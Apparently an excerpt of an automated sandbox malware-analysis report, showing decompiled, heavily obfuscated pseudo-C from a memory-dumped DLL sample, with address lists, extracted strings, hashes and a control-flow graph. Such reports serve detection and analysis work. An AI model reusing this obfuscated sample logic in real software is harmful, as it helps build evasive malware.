                                                                                                                                                                            							_push(_v120);
                                                                                                                                                                            							_push(_v176);
                                                                                                                                                                            							_push(_v380);
                                                                                                                                                                            							__eflags = E02F5738A(_v288, _t905, _v232, _v168,  &_v80, E02F6E1F8(0x2f51318, _v100, __eflags), _v296) - _v112;
                                                                                                                                                                            							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
                                                                                                                                                                            							E02F6FECB(_t905, _v160, _v348, _v412, _v256);
                                                                                                                                                                            							E02F6FECB(_t906, _v372, _v152, _v404, _v92);
                                                                                                                                                                            							_t1048 =  &(_t1048[0x11]);
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t929 == _t1041) {
                                                                                                                                                                            							_push(_v216);
                                                                                                                                                                            							_push(_v444);
                                                                                                                                                                            							_push(_v356);
                                                                                                                                                                            							_t1045 = E02F6E1F8(0x2f51438, _v136, __eflags);
                                                                                                                                                                            							_v44 = _v436;
                                                                                                                                                                            							_v40 = _v208;
                                                                                                                                                                            							_v36 = _v96;
                                                                                                                                                                            							_t918 =  *0x2f76224; // 0x0
                                                                                                                                                                            							_t974 =  *0x2f76224; // 0x0
                                                                                                                                                                            							_t919 = E02F550E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0x2f51438, 0x2f51438,  &_v44, _v200, 0x2f51438, _v240, _t913);
                                                                                                                                                                            							_t1052 =  &(_t1048[0x10]);
                                                                                                                                                                            							__eflags = _t919 - _v248;
                                                                                                                                                                            							if(_t919 != _v248) {
                                                                                                                                                                            								_t929 = 0xa3576f8;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t929 = _t1038;
                                                                                                                                                                            								_t1046 = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            							E02F6FECB(_t1045, _v428, _v88, _v388, _v304);
                                                                                                                                                                            							_t1048 =  &(_t1052[3]);
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t929 == _t952) {
                                                                                                                                                                            							_t925 =  *0x2f76224; // 0x0
                                                                                                                                                                            							_push(_t952);
                                                                                                                                                                            							_push(_t952);
                                                                                                                                                                            							_t977 = E02F5C5D8( *((intOrPtr*)(_t925 + 0x54)));
                                                                                                                                                                            							_t1048 =  &(_t1048[3]);
                                                                                                                                                                            							_t927 =  *0x2f76224; // 0x0
                                                                                                                                                                            							__eflags = _t977;
                                                                                                                                                                            							_t929 =  !=  ? _t1041 : _t1038;
                                                                                                                                                                            							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t929 != _t1038) {
                                                                                                                                                                            							goto L26;
                                                                                                                                                                            						}
                                                                                                                                                                            						E02F5F7FE(_v344, _v80, _v352, _v228);
                                                                                                                                                                            						L9:
                                                                                                                                                                            						return _t1046;
                                                                                                                                                                            						L26:
                                                                                                                                                                            						__eflags = _t929 - 0x45eecb1;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






















































































































































                                                                                                                                                                            0x02f53431
                                                                                                                                                                            0x02f53437
                                                                                                                                                                            0x02f53441
                                                                                                                                                                            0x02f53450
                                                                                                                                                                            0x02f53457
                                                                                                                                                                            0x02f53459
                                                                                                                                                                            0x02f5345e
                                                                                                                                                                            0x02f53469
                                                                                                                                                                            0x02f5346e
                                                                                                                                                                            0x02f5346f
                                                                                                                                                                            0x02f53473
                                                                                                                                                                            0x02f5347b
                                                                                                                                                                            0x02f53486
                                                                                                                                                                            0x02f53491
                                                                                                                                                                            0x02f5349c
                                                                                                                                                                            0x02f534a4
                                                                                                                                                                            0x02f534a9
                                                                                                                                                                            0x02f534b1
                                                                                                                                                                            0x02f534b6
                                                                                                                                                                            0x02f534be
                                                                                                                                                                            0x02f534c9
                                                                                                                                                                            0x02f534d1
                                                                                                                                                                            0x02f534dc
                                                                                                                                                                            0x02f534e7
                                                                                                                                                                            0x02f534ef
                                                                                                                                                                            0x02f534fa
                                                                                                                                                                            0x02f53505
                                                                                                                                                                            0x02f53510
                                                                                                                                                                            0x02f5351b
                                                                                                                                                                            0x02f53526
                                                                                                                                                                            0x02f5352e
                                                                                                                                                                            0x02f53539
                                                                                                                                                                            0x02f53544
                                                                                                                                                                            0x02f5354f
                                                                                                                                                                            0x02f5355a
                                                                                                                                                                            0x02f53565
                                                                                                                                                                            0x02f53570
                                                                                                                                                                            0x02f5357b
                                                                                                                                                                            0x02f53586
                                                                                                                                                                            0x02f53591
                                                                                                                                                                            0x02f5359c
                                                                                                                                                                            0x02f535a7
                                                                                                                                                                            0x02f535b2
                                                                                                                                                                            0x02f535bd
                                                                                                                                                                            0x02f535c8
                                                                                                                                                                            0x02f535d0
                                                                                                                                                                            0x02f535db
                                                                                                                                                                            0x02f535ef
                                                                                                                                                                            0x02f535f6
                                                                                                                                                                            0x02f535fe
                                                                                                                                                                            0x02f53609
                                                                                                                                                                            0x02f53614
                                                                                                                                                                            0x02f5361c
                                                                                                                                                                            0x02f53627
                                                                                                                                                                            0x02f5362f
                                                                                                                                                                            0x02f53637
                                                                                                                                                                            0x02f5363f
                                                                                                                                                                            0x02f53647
                                                                                                                                                                            0x02f5364f
                                                                                                                                                                            0x02f5365c
                                                                                                                                                                            0x02f53660
                                                                                                                                                                            0x02f5366d
                                                                                                                                                                            0x02f53671
                                                                                                                                                                            0x02f53679
                                                                                                                                                                            0x02f53684
                                                                                                                                                                            0x02f5368f
                                                                                                                                                                            0x02f5369a
                                                                                                                                                                            0x02f536a5
                                                                                                                                                                            0x02f536af
                                                                                                                                                                            0x02f536ba
                                                                                                                                                                            0x02f536c5
                                                                                                                                                                            0x02f536da
                                                                                                                                                                            0x02f536dd
                                                                                                                                                                            0x02f536e4
                                                                                                                                                                            0x02f536ef
                                                                                                                                                                            0x02f536f7
                                                                                                                                                                            0x02f536ff
                                                                                                                                                                            0x02f53707
                                                                                                                                                                            0x02f5370c
                                                                                                                                                                            0x02f53714
                                                                                                                                                                            0x02f5371f
                                                                                                                                                                            0x02f5372a
                                                                                                                                                                            0x02f53735
                                                                                                                                                                            0x02f5374b
                                                                                                                                                                            0x02f53752
                                                                                                                                                                            0x02f5375d
                                                                                                                                                                            0x02f53768
                                                                                                                                                                            0x02f53773
                                                                                                                                                                            0x02f5377b
                                                                                                                                                                            0x02f53786
                                                                                                                                                                            0x02f53799
                                                                                                                                                                            0x02f5379c
                                                                                                                                                                            0x02f537ae
                                                                                                                                                                            0x02f537b5
                                                                                                                                                                            0x02f537c0
                                                                                                                                                                            0x02f537cb
                                                                                                                                                                            0x02f537d6
                                                                                                                                                                            0x02f537de
                                                                                                                                                                            0x02f537e9
                                                                                                                                                                            0x02f537f4
                                                                                                                                                                            0x02f537ff
                                                                                                                                                                            0x02f5380a
                                                                                                                                                                            0x02f53812
                                                                                                                                                                            0x02f5381e
                                                                                                                                                                            0x02f53821
                                                                                                                                                                            0x02f53825
                                                                                                                                                                            0x02f5382a
                                                                                                                                                                            0x02f53832
                                                                                                                                                                            0x02f5383a
                                                                                                                                                                            0x02f53842
                                                                                                                                                                            0x02f53847
                                                                                                                                                                            0x02f5384f
                                                                                                                                                                            0x02f53857
                                                                                                                                                                            0x02f53862
                                                                                                                                                                            0x02f5386d
                                                                                                                                                                            0x02f53878
                                                                                                                                                                            0x02f53883
                                                                                                                                                                            0x02f5388b
                                                                                                                                                                            0x02f53890
                                                                                                                                                                            0x02f53895
                                                                                                                                                                            0x02f5389d
                                                                                                                                                                            0x02f538a5
                                                                                                                                                                            0x02f538b0
                                                                                                                                                                            0x02f538bb
                                                                                                                                                                            0x02f538c6
                                                                                                                                                                            0x02f538ce
                                                                                                                                                                            0x02f538d6
                                                                                                                                                                            0x02f538de
                                                                                                                                                                            0x02f538e6
                                                                                                                                                                            0x02f538ee
                                                                                                                                                                            0x02f538f9
                                                                                                                                                                            0x02f53904
                                                                                                                                                                            0x02f5390f
                                                                                                                                                                            0x02f5391a
                                                                                                                                                                            0x02f53922
                                                                                                                                                                            0x02f5392f
                                                                                                                                                                            0x02f5393e
                                                                                                                                                                            0x02f53941
                                                                                                                                                                            0x02f53945
                                                                                                                                                                            0x02f5394d
                                                                                                                                                                            0x02f53955
                                                                                                                                                                            0x02f5395d
                                                                                                                                                                            0x02f53965
                                                                                                                                                                            0x02f53975
                                                                                                                                                                            0x02f53979
                                                                                                                                                                            0x02f5397e
                                                                                                                                                                            0x02f53986
                                                                                                                                                                            0x02f53991
                                                                                                                                                                            0x02f5399c
                                                                                                                                                                            0x02f539a7
                                                                                                                                                                            0x02f539b2
                                                                                                                                                                            0x02f539bd
                                                                                                                                                                            0x02f539c8
                                                                                                                                                                            0x02f539d3
                                                                                                                                                                            0x02f539de
                                                                                                                                                                            0x02f539e9
                                                                                                                                                                            0x02f539f0
                                                                                                                                                                            0x02f539fb
                                                                                                                                                                            0x02f53a03
                                                                                                                                                                            0x02f53a0b
                                                                                                                                                                            0x02f53a13
                                                                                                                                                                            0x02f53a1b
                                                                                                                                                                            0x02f53a23
                                                                                                                                                                            0x02f53a30
                                                                                                                                                                            0x02f53a33
                                                                                                                                                                            0x02f53a3c
                                                                                                                                                                            0x02f53a40
                                                                                                                                                                            0x02f53a48
                                                                                                                                                                            0x02f53a50
                                                                                                                                                                            0x02f53a5b
                                                                                                                                                                            0x02f53a63
                                                                                                                                                                            0x02f53a6e
                                                                                                                                                                            0x02f53a7e
                                                                                                                                                                            0x02f53a82
                                                                                                                                                                            0x02f53a87
                                                                                                                                                                            0x02f53a8f
                                                                                                                                                                            0x02f53a97
                                                                                                                                                                            0x02f53aa2
                                                                                                                                                                            0x02f53aad
                                                                                                                                                                            0x02f53ab8
                                                                                                                                                                            0x02f53ac3
                                                                                                                                                                            0x02f53acb
                                                                                                                                                                            0x02f53ad6
                                                                                                                                                                            0x02f53ae1
                                                                                                                                                                            0x02f53ae9
                                                                                                                                                                            0x02f53af9
                                                                                                                                                                            0x02f53afd
                                                                                                                                                                            0x02f53b02
                                                                                                                                                                            0x02f53b0a
                                                                                                                                                                            0x02f53b1c
                                                                                                                                                                            0x02f53b1f
                                                                                                                                                                            0x02f53b26
                                                                                                                                                                            0x02f53b31
                                                                                                                                                                            0x02f53b3c
                                                                                                                                                                            0x02f53b44
                                                                                                                                                                            0x02f53b51
                                                                                                                                                                            0x02f53b5d
                                                                                                                                                                            0x02f53b62
                                                                                                                                                                            0x02f53b68
                                                                                                                                                                            0x02f53b70
                                                                                                                                                                            0x02f53b83
                                                                                                                                                                            0x02f53b86
                                                                                                                                                                            0x02f53b8d
                                                                                                                                                                            0x02f53b95
                                                                                                                                                                            0x02f53ba0
                                                                                                                                                                            0x02f53bab
                                                                                                                                                                            0x02f53bb6
                                                                                                                                                                            0x02f53bc1
                                                                                                                                                                            0x02f53bcc
                                                                                                                                                                            0x02f53bd7
                                                                                                                                                                            0x02f53be2
                                                                                                                                                                            0x02f53bed
                                                                                                                                                                            0x02f53c03
                                                                                                                                                                            0x02f53c0a
                                                                                                                                                                            0x02f53c15
                                                                                                                                                                            0x02f53c20
                                                                                                                                                                            0x02f53c2b
                                                                                                                                                                            0x02f53c36
                                                                                                                                                                            0x02f53c49
                                                                                                                                                                            0x02f53c4a
                                                                                                                                                                            0x02f53c51
                                                                                                                                                                            0x02f53c59
                                                                                                                                                                            0x02f53c64
                                                                                                                                                                            0x02f53c77
                                                                                                                                                                            0x02f53c7e
                                                                                                                                                                            0x02f53c89
                                                                                                                                                                            0x02f53c94
                                                                                                                                                                            0x02f53c9f
                                                                                                                                                                            0x02f53caa
                                                                                                                                                                            0x02f53cb2
                                                                                                                                                                            0x02f53cba
                                                                                                                                                                            0x02f53cbf
                                                                                                                                                                            0x02f53cc7
                                                                                                                                                                            0x02f53ccf
                                                                                                                                                                            0x02f53cd7
                                                                                                                                                                            0x02f53cdb
                                                                                                                                                                            0x02f53ce0
                                                                                                                                                                            0x02f53ce5
                                                                                                                                                                            0x02f53ced
                                                                                                                                                                            0x02f53cf8
                                                                                                                                                                            0x02f53d03
                                                                                                                                                                            0x02f53d0e
                                                                                                                                                                            0x02f53d1c
                                                                                                                                                                            0x02f53d25
                                                                                                                                                                            0x02f53d29
                                                                                                                                                                            0x02f53d31
                                                                                                                                                                            0x02f53d3c
                                                                                                                                                                            0x02f53d47
                                                                                                                                                                            0x02f53d52
                                                                                                                                                                            0x02f53d5d
                                                                                                                                                                            0x02f53d68
                                                                                                                                                                            0x02f53d73
                                                                                                                                                                            0x02f53d7e
                                                                                                                                                                            0x02f53d89
                                                                                                                                                                            0x02f53d91
                                                                                                                                                                            0x02f53d9c
                                                                                                                                                                            0x02f53da7
                                                                                                                                                                            0x02f53daf
                                                                                                                                                                            0x02f53dba
                                                                                                                                                                            0x02f53dc2
                                                                                                                                                                            0x02f53dca
                                                                                                                                                                            0x02f53dd2
                                                                                                                                                                            0x02f53ddc
                                                                                                                                                                            0x02f53de4
                                                                                                                                                                            0x02f53df9
                                                                                                                                                                            0x02f53dfc
                                                                                                                                                                            0x02f53e03
                                                                                                                                                                            0x02f53e0e
                                                                                                                                                                            0x02f53e19
                                                                                                                                                                            0x02f53e2f
                                                                                                                                                                            0x02f53e36
                                                                                                                                                                            0x02f53e41
                                                                                                                                                                            0x02f53e4c
                                                                                                                                                                            0x02f53e54
                                                                                                                                                                            0x02f53e5f
                                                                                                                                                                            0x02f53e6a
                                                                                                                                                                            0x02f53e7d
                                                                                                                                                                            0x02f53e80
                                                                                                                                                                            0x02f53e87
                                                                                                                                                                            0x02f53e92
                                                                                                                                                                            0x02f53e9d
                                                                                                                                                                            0x02f53eb0
                                                                                                                                                                            0x02f53eb7
                                                                                                                                                                            0x02f53ec2
                                                                                                                                                                            0x02f53ecd
                                                                                                                                                                            0x02f53ee3
                                                                                                                                                                            0x02f53eea
                                                                                                                                                                            0x02f53ef5
                                                                                                                                                                            0x02f53f00
                                                                                                                                                                            0x02f53f08
                                                                                                                                                                            0x02f53f13
                                                                                                                                                                            0x02f53f1e
                                                                                                                                                                            0x02f53f30
                                                                                                                                                                            0x02f53f33
                                                                                                                                                                            0x02f53f3a
                                                                                                                                                                            0x02f53f42
                                                                                                                                                                            0x02f53f4d
                                                                                                                                                                            0x02f53f58
                                                                                                                                                                            0x02f53f60
                                                                                                                                                                            0x02f53f6b
                                                                                                                                                                            0x02f53f7e
                                                                                                                                                                            0x02f53f85
                                                                                                                                                                            0x02f53f90
                                                                                                                                                                            0x02f53f98
                                                                                                                                                                            0x02f53fa0
                                                                                                                                                                            0x02f53fa8
                                                                                                                                                                            0x02f53fb0
                                                                                                                                                                            0x02f53fb8
                                                                                                                                                                            0x02f53fc0
                                                                                                                                                                            0x02f53fcd
                                                                                                                                                                            0x02f53fd1
                                                                                                                                                                            0x02f53fd9
                                                                                                                                                                            0x02f53fe1
                                                                                                                                                                            0x02f53fec
                                                                                                                                                                            0x02f53ff7
                                                                                                                                                                            0x02f54002
                                                                                                                                                                            0x02f5400d
                                                                                                                                                                            0x02f54018
                                                                                                                                                                            0x02f54023
                                                                                                                                                                            0x02f5402e
                                                                                                                                                                            0x02f54036
                                                                                                                                                                            0x02f5403e
                                                                                                                                                                            0x02f54049
                                                                                                                                                                            0x02f54054
                                                                                                                                                                            0x02f5405f
                                                                                                                                                                            0x02f5406a
                                                                                                                                                                            0x02f54077
                                                                                                                                                                            0x02f54082
                                                                                                                                                                            0x02f5408e
                                                                                                                                                                            0x02f54095
                                                                                                                                                                            0x02f5409a
                                                                                                                                                                            0x02f540a3
                                                                                                                                                                            0x02f540ae
                                                                                                                                                                            0x02f540b9
                                                                                                                                                                            0x02f540cc
                                                                                                                                                                            0x02f540cf
                                                                                                                                                                            0x02f540d6
                                                                                                                                                                            0x02f540e1
                                                                                                                                                                            0x02f540f4
                                                                                                                                                                            0x02f540fb
                                                                                                                                                                            0x02f54106
                                                                                                                                                                            0x02f54111
                                                                                                                                                                            0x02f54119
                                                                                                                                                                            0x02f54126
                                                                                                                                                                            0x02f5412a
                                                                                                                                                                            0x02f5412f
                                                                                                                                                                            0x02f54137
                                                                                                                                                                            0x02f54142
                                                                                                                                                                            0x02f5414a
                                                                                                                                                                            0x02f54155
                                                                                                                                                                            0x02f54165
                                                                                                                                                                            0x02f54169
                                                                                                                                                                            0x02f5416e
                                                                                                                                                                            0x02f54176
                                                                                                                                                                            0x02f5417e
                                                                                                                                                                            0x02f54189
                                                                                                                                                                            0x02f54194
                                                                                                                                                                            0x02f5419f
                                                                                                                                                                            0x02f541aa
                                                                                                                                                                            0x02f541b2
                                                                                                                                                                            0x02f541b7
                                                                                                                                                                            0x02f541c4
                                                                                                                                                                            0x02f541c5
                                                                                                                                                                            0x02f541c9
                                                                                                                                                                            0x02f541d1
                                                                                                                                                                            0x02f541dc
                                                                                                                                                                            0x02f541e7
                                                                                                                                                                            0x02f541f2
                                                                                                                                                                            0x02f541ff
                                                                                                                                                                            0x02f54209
                                                                                                                                                                            0x02f5420d
                                                                                                                                                                            0x02f54212
                                                                                                                                                                            0x02f5421a
                                                                                                                                                                            0x02f54222
                                                                                                                                                                            0x02f5422a
                                                                                                                                                                            0x02f54232
                                                                                                                                                                            0x02f5423a
                                                                                                                                                                            0x02f54242
                                                                                                                                                                            0x02f5424a
                                                                                                                                                                            0x02f54252
                                                                                                                                                                            0x02f5425a
                                                                                                                                                                            0x02f5425f
                                                                                                                                                                            0x02f54267
                                                                                                                                                                            0x02f54267
                                                                                                                                                                            0x02f54267
                                                                                                                                                                            0x02f5426c
                                                                                                                                                                            0x02f54271
                                                                                                                                                                            0x02f54271
                                                                                                                                                                            0x02f54276
                                                                                                                                                                            0x02f54276
                                                                                                                                                                            0x02f54276
                                                                                                                                                                            0x02f54276
                                                                                                                                                                            0x02f54278
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54628
                                                                                                                                                                            0x02f5462e
                                                                                                                                                                            0x02f54707
                                                                                                                                                                            0x02f54714
                                                                                                                                                                            0x02f5471b
                                                                                                                                                                            0x02f5471d
                                                                                                                                                                            0x02f5471d
                                                                                                                                                                            0x02f54722
                                                                                                                                                                            0x02f54727
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54727
                                                                                                                                                                            0x02f54634
                                                                                                                                                                            0x02f54636
                                                                                                                                                                            0x02f5464e
                                                                                                                                                                            0x02f5465a
                                                                                                                                                                            0x02f54661
                                                                                                                                                                            0x02f5466c
                                                                                                                                                                            0x02f54690
                                                                                                                                                                            0x02f546c7
                                                                                                                                                                            0x02f546de
                                                                                                                                                                            0x02f546ef
                                                                                                                                                                            0x02f546f4
                                                                                                                                                                            0x02f543ef
                                                                                                                                                                            0x02f543ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f543ef
                                                                                                                                                                            0x02f54638
                                                                                                                                                                            0x02f5463e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54644
                                                                                                                                                                            0x02f54644
                                                                                                                                                                            0x02f5427e
                                                                                                                                                                            0x02f544d1
                                                                                                                                                                            0x02f544dd
                                                                                                                                                                            0x02f544e1
                                                                                                                                                                            0x02f544ec
                                                                                                                                                                            0x02f544f1
                                                                                                                                                                            0x02f544fa
                                                                                                                                                                            0x02f544fc
                                                                                                                                                                            0x02f54500
                                                                                                                                                                            0x02f5450e
                                                                                                                                                                            0x02f54526
                                                                                                                                                                            0x02f5452d
                                                                                                                                                                            0x02f54534
                                                                                                                                                                            0x02f54543
                                                                                                                                                                            0x02f54551
                                                                                                                                                                            0x02f5455c
                                                                                                                                                                            0x02f5456a
                                                                                                                                                                            0x02f54571
                                                                                                                                                                            0x02f54579
                                                                                                                                                                            0x02f545d3
                                                                                                                                                                            0x02f545e3
                                                                                                                                                                            0x02f545fb
                                                                                                                                                                            0x02f5461b
                                                                                                                                                                            0x02f54620
                                                                                                                                                                            0x02f544c7
                                                                                                                                                                            0x02f544c7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f544c7
                                                                                                                                                                            0x02f5428a
                                                                                                                                                                            0x02f543f9
                                                                                                                                                                            0x02f54405
                                                                                                                                                                            0x02f5440c
                                                                                                                                                                            0x02f54414
                                                                                                                                                                            0x02f54419
                                                                                                                                                                            0x02f54427
                                                                                                                                                                            0x02f5442e
                                                                                                                                                                            0x02f5447a
                                                                                                                                                                            0x02f5448e
                                                                                                                                                                            0x02f5449f
                                                                                                                                                                            0x02f544bf
                                                                                                                                                                            0x02f544c4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f544c4
                                                                                                                                                                            0x02f54292
                                                                                                                                                                            0x02f54311
                                                                                                                                                                            0x02f5431d
                                                                                                                                                                            0x02f54321
                                                                                                                                                                            0x02f54334
                                                                                                                                                                            0x02f5433a
                                                                                                                                                                            0x02f54349
                                                                                                                                                                            0x02f5435e
                                                                                                                                                                            0x02f5437e
                                                                                                                                                                            0x02f543a9
                                                                                                                                                                            0x02f543b2
                                                                                                                                                                            0x02f543b7
                                                                                                                                                                            0x02f543ba
                                                                                                                                                                            0x02f543c1
                                                                                                                                                                            0x02f543ca
                                                                                                                                                                            0x02f543c3
                                                                                                                                                                            0x02f543c5
                                                                                                                                                                            0x02f543c7
                                                                                                                                                                            0x02f543c7
                                                                                                                                                                            0x02f543e7
                                                                                                                                                                            0x02f543ec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f543ec
                                                                                                                                                                            0x02f54296
                                                                                                                                                                            0x02f542e9
                                                                                                                                                                            0x02f542ee
                                                                                                                                                                            0x02f542ef
                                                                                                                                                                            0x02f542f8
                                                                                                                                                                            0x02f542fa
                                                                                                                                                                            0x02f542fd
                                                                                                                                                                            0x02f54302
                                                                                                                                                                            0x02f54306
                                                                                                                                                                            0x02f54309
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54309
                                                                                                                                                                            0x02f5429a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f542b9
                                                                                                                                                                            0x02f542c2
                                                                                                                                                                            0x02f542cc
                                                                                                                                                                            0x02f5472c
                                                                                                                                                                            0x02f5472c
                                                                                                                                                                            0x02f5472c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f54738

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
                                                                                                                                                                            • API String ID: 0-2179300830
                                                                                                                                                                            • Opcode ID: 75da5ad9149bee8b6abf775491c46e37f4aa55aea91c62b97148f70db7b074c9
                                                                                                                                                                            • Instruction ID: 930d767289ef41cf266946125d161b077dc6a2983b62272b1d3dc3ee508069c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 75da5ad9149bee8b6abf775491c46e37f4aa55aea91c62b97148f70db7b074c9
                                                                                                                                                                            • Instruction Fuzzy Hash: 3492FE715093809FD3B9CF25C98AB9FBBE2BBC4344F10891DE69A86260D7B18549CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 549 2f667e6-2f6750a call 2f6fe29 552 2f67511 549->552 553 2f67516 552->553 554 2f6751a-2f67520 553->554 555 2f67526 554->555 556 2f676b5-2f676b7 554->556 557 2f6752c-2f67532 555->557 558 2f676ab-2f676b0 555->558 559 2f67772-2f67775 556->559 560 2f676bd-2f676c3 556->560 561 2f6768b-2f676a6 call 2f54bfc 557->561 562 2f67538-2f6753e 557->562 558->554 563 2f677a6 559->563 564 2f67777-2f677a4 call 2f6e1f8 559->564 565 2f67749-2f6776d call 2f5ef0c 560->565 566 2f676c9-2f676cf 560->566 593 2f675fc-2f67603 561->593 567 2f67544-2f6754a 562->567 568 2f6762a-2f67686 call 2f5dda9 call 2f72b09 562->568 574 2f677ad-2f677ef 563->574 564->574 565->593 572 2f676d5-2f676db 566->572 573 2f6792e-2f67944 call 2f6e358 566->573 577 2f67550-2f67556 567->577 578 2f67608-2f67628 call 2f6e358 567->578 613 2f67915-2f6791c 568->613 582 2f676f3-2f676f7 572->582 583 2f676dd-2f676e3 572->583 597 2f67945-2f67951 573->597 584 2f677f7-2f67862 call 2f54a88 call 2f6fecb 574->584 585 2f677f1 574->585 591 2f6755c-2f67563 577->591 592 2f675dd-2f675f5 call 2f6e358 577->592 605 2f675fa-2f675fb 578->605 586 2f67705 582->586 587 2f676f9-2f67703 582->587 595 2f67921-2f67927 583->595 596 2f676e9-2f676ee 583->596 615 2f67910 584->615 616 2f67868-2f6789c call 2f73e0e 584->616 585->584 599 2f67707-2f67744 call 2f710dc 586->599 587->599 591->595 602 2f67569-2f675d8 call 2f5ed66 591->602 592->605 593->552 595->597 598 2f67929 595->598 596->554 598->553 599->593 602->554 605->593 613->595 615->613 619 2f67906-2f6790b 616->619 620 2f6789e-2f67903 call 2f6c8cf call 2f73e0e 616->620 619->593 620->619
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F667E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                            				signed int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				signed int _v224;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				signed int _v232;
                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                            				signed int _v244;
                                                                                                                                                                            				signed int _v248;
                                                                                                                                                                            				signed int _v252;
                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				signed int _v264;
                                                                                                                                                                            				signed int _v268;
                                                                                                                                                                            				signed int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				signed int _v284;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _t846;
                                                                                                                                                                            				intOrPtr _t847;
                                                                                                                                                                            				signed int _t861;
                                                                                                                                                                            				void* _t866;
                                                                                                                                                                            				signed int _t867;
                                                                                                                                                                            				signed int _t874;
                                                                                                                                                                            				signed int* _t876;
                                                                                                                                                                            				signed int _t885;
                                                                                                                                                                            				void* _t937;
                                                                                                                                                                            				signed int _t946;
                                                                                                                                                                            				signed int _t960;
                                                                                                                                                                            				signed int _t961;
                                                                                                                                                                            				signed int _t962;
